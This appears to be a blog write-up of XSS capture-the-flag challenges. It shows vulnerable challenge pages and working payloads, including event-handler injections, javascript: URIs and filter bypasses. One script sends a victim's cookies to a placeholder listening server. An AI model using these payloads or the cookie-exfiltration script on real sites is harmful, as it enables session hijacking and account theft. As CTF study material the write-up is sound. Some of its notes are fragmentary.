xss

Posted on Edited on In Views: Disqus: Word count in article: 934 Reading time ≈ 3 mins.
xss

xss challenges by int21h

stage 1

1
2
3
4
<form action="?sid=3b4530debfc45d8e44d05547567e54ccb348e190" method="post">
  Search: <input type="text" name="p1" size="60" value="" />
  <input type="submit" value="Search" />
</form>

stage 2

1
2
3
4
5
6
<form action="?sid=454ea068a1791c26fe09f235c31fdaf523b7ecfd" method="post">
  <hr class="red" />
  Search: <input type="text" name="p1" size="60" value="" />
  <input type="submit" value="Search" />
  <hr class="red" />
</form>
%}

stage 3 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<b>Hint:</b> <span id="hide">The input in text box is properly escaped.</span>
<input type="hidden" name="key" value="tubhf%605/qiq" />
<form action="?sid=0a6d663df55034885f64633e535afb4c5a1a1b30" method="post">
  Search a place: <input type="text" name="p1" size="30" />
  <input type="submit" value="Search" /> &nbsp; Choose a country:
  <select name="p2">
    <!-- <option>Japan</option> -->
    <option>Japan</option>
    //
    <option>
      <script>
        alert(1);
      </script>
    </option>
    <option>Germany</option>
    <option>USA</option>
    <option>United Kingdom</option>
  </select>
</form>
<span id="msg" style="display:none"></span>
<p></p>
<hr />

stage 4 

1
2
3
4
5
6
7
8
9
10
11
<form action="?sid=f259051837d00c498286decbebd9332a93941de0" method="post">
  Search a place: <input type="text" name="p1" size="30" />
  <input type="submit" value="Search" /> &nbsp; Choose a country:
  <select name="p2">
    <option>Japan</option>
    <option>Germany</option>
    <option>USA</option>
    <option>United Kingdom</option>
  </select>
  <input type="hidden" name="p3" value="hackme" />
</form>
1
2
3
4
5
<input type="show" name="p3" value="" />
<script>
  alert(document.domain);
</script>
">

stage 5 

1
2
3
<hr class="red" />
Search: <input type="text" name="p1" maxlength="15" size="30" value="" /> //
<input type="text" name="p1" size="30" value="" maxlength="50" />

stage 6

??? {% spoiler onmouseover=alert(document.domain)

stage 7

???

arst onmouseover=alert(document.domain) %}

stage 8

JavaScript Pseudo-protocol(JavaScript 伪协议) 
1
2
3
4
5
6
7
8
9
10
<form action="?sid=19ed8385d5064a30fee35d44597cc90d2103e5b9" method="post">
  Input a URL: <input type="text" name="p1" size="50" />
  <input type="submit" value="Make a Link" />
  <hr class="red" />
  URL:
  <a href='"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;'
    >"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</a
  >
  <hr class="red" />
</form>
{% spoiler javascript:alert(document.domain)

stage 9

???

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<form action="?sid=7e2329d79d97959657ca5b762ed3314b0fbe5f00" method="post">
  <hr class="red" />
  No results for your Query. Try again:
  <!------------------------------------------------>
  <input
    type="text"
    name="p1"
    size="50"
    value='"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;'
  />
  <input name="charset" value="euc-jp" type="text" />
  <!------------------------------------------------>

  <input type="submit" value="Search" />
  <hr class="red" />
</form>

stage 10

1
2
3
4
5
6
7
8
9
10
11
<form action="?sid=3dbc35c98d4e77299ef69405ec1bd1ae7f6fdc56" method="post">
  <hr class="red" />
  No results for your Query. Try again:
  <input type="text" name="p1" size="50" value="" />
  <script>
    alert(document.)
  </script>
  "&gt;
  <input type="submit" value="Search" />
  <hr class="red" />
</form>
onmouseover=alert(document.domdomainain)

stage 11-

??

XSS Challenge by y0n3uchy

Baby XSS 01

Reflected XSS

1
2
3
4
5
6
7
8
9
10
11
<script src="hook.js"></script>
<?php echo $_GET["payload"]; ?>

<h1>inject</h1>
<form>
  <input type="text" name="payload" placeholder="your payload here" />
  <input type="submit" value="GO" />
</form>

<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?>
1
2
3
4
5
6
7
8
9
<script>
  new Image().src =
    "http://YOUR_LISTENING_SERVER_IP:PORT/?cookie=" +
    encodeURIComponent(document.cookie);
</script>

<script>
  fetch("http://YOUR_LISTENING_SERVER_IP:PORT/?cookie=" + document.cookie);
</script>

Baby XSS 02

DOM-based XSS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<script src="hook.js"></script>
<script>
  window.addEventListener("load", function () {
    var q = location.hash.substring(1);
    window.query.innerHTML = q == "" ? `Hello!` : `Hello, ${decodeURI(q)}`;
  });
</script>

<p id="query"></p>

<h1>inject</h1>
<p>Inspect the source code carefully and find where to inject :-)</p>

<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?> ``
1
url#<img src="x" onerror="alert(document.cookie)" />

Baby XSS 03

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<script src="hook.js"></script>
<?php $escaped = htmlspecialchars($_GET['payload']); ?>

<h1>Hello, <?= $escaped ?></h1>
<a href="<?= $escaped ?>/friends">Friends</a>
<a href="<?= $escaped ?>/post">Posts</a>
<a href="<?= $escaped ?>/settings">Settings</a>

<h1>inject</h1>
<form>
  <input type="text" name="payload" placeholder="your payload here" />
  <input type="submit" value="GO" />
</form>

<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?>
javascript:alert(XSS)

Baby XSS 04

1
??? ${alert('XSS')}

No Alphabets and Digits

???

JSFuck

No Parentheses

ES6 标签模板 (Tagged Templates)

1
alert`1`;

same as alert(1)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
script src="hook.js"></script>
<?php
// you cannot do anything without ...

// no parentheses ...
$escaped = preg_replace("/[()]/", "", $_GET['payload']);

// no event handlers!
$escaped = preg_replace("/.*o.*n.*/i", "", $escaped);
?>

<h1>Hello, <?= $escaped ?>!</h1>


<h1>inject</h1>
<form>
    <input type="text" name="payload" placeholder="your payload here">
    <input type="submit" value="GO">
</form>

<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?>

No Quotes

String.fromCharCode() convert a ASCII to a character.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<script src="hook.js"></script>
<?php
// by escaping the payload you won't break this system, haha! :-)
$escaped = preg_replace("/['\"`&#]/", "", $_GET['payload']);
?>

<h1>Hello, <?= $escaped ?>!</h1>

<h1>inject</h1>
<form>
    <input type="text" name="payload" placeholder="your payload here">
    <input type="submit" value="GO">
</form>

<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?>

No Parentheses Again

URL 解析机制 + javascript: 伪协议

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<script src="hook.js"></script>
<?php
$escaped = preg_replace("/[`()<>&#]/", "", $_GET['payload']);
?>

<h1>Hello, <span id="<?= $escaped ?>"><?= htmlspecialchars($_GET['payload']) ?></span>!</h1>

<h1>inject</h1>
<form>
    <input type="text" name="payload" placeholder="your payload here">
    <input type="submit" value="GO">
</form>

<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?>
onmouseover=location=javascript:alert%28%22XSS%22%29

Replacement

???

1
<scr<script>ipt>alert(1)</script>

Reining the Web by Whitelisting

JSONP (JSON with Padding)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php header("Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline'"); ?>
<script src="hook.js"></script>

<script src="csp01-util.js"></script>
<script src="csp01-jsonp.php?callback=callback"></script>

<h1>Hello, <?= $_GET['payload'] ?>!</h1>

<h1>inject</h1>
<form>
  <input type="text" name="payload" placeholder="your payload here" />
  <input type="submit" value="GO" />
</form>

<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?>